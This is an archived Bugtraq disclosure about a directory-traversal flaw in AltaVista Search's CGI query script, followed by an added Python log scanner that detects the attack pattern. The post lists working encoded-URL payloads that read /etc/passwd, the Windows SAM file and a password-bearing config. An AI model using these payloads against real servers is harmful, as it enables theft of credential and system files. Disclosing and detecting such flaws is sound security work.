[13307] in bugtraq
Altavista followup
daemon@ATHENA.MIT.EDU (rudi carell)
Tue Jan 11 01:23:41 2000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id: <20000109153704.76319.qmail@hotmail.com>
Date: Sun, 9 Jan 2000 07:37:04 PST
Reply-To: rudi carell <rudicarell@HOTMAIL.COM>
From: rudi carell <rudicarell@HOTMAIL.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
hola,
more bugs in the AV-Search thing ..
using uri-encoded strings it is possible to view "any" file on the system ..
examples:
unixxxsss ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
or on a micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
rudicarell@hotmail.com
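
A log check for the request pattern in this post, added here as an example; it is not part of the original message and not AltaVista's code. It flags `mss` values that decode to a parent-directory segment or an absolute path, including double-encoded forms. The log lines, the regex and all function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (Common Log Format); hosts and paths are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jan/2000:01:20:00 +0000] "GET /cgi-bin/query?mss=simple HTTP/1.0" 200 512',
    '10.0.0.9 - - [11/Jan/2000:01:21:10 +0000] "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2fetc/example.conf HTTP/1.0" 200 900',
    '10.0.0.9 - - [11/Jan/2000:01:21:40 +0000] "GET /cgi-bin/query?mss=%252e%252e%255cexample.txt HTTP/1.0" 200 80',
    '10.0.0.7 - - [11/Jan/2000:01:22:00 +0000] "GET /cgi-bin/query?q=a..b&mss=search/advanced HTTP/1.0" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(raw_value):
    """True if the decoded value has a '..' segment or is an absolute path."""
    path = fully_decode(raw_value).replace("\\", "/")
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return True
    return ".." in path.split("/")

def raw_params(query):
    """Split the query string without decoding, so the encoded form stays visible."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        yield name, value

def scan(lines, param="mss"):
    """Return (line_number, raw_value) for requests whose `param` looks like traversal."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in raw_params(urlsplit(match.group(1)).query):
            if name == param and is_traversal(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same `is_traversal` test can be applied server-side to reject the parameter before any file is opened, ideally combined with resolving the final path and confirming it stays under the intended base directory.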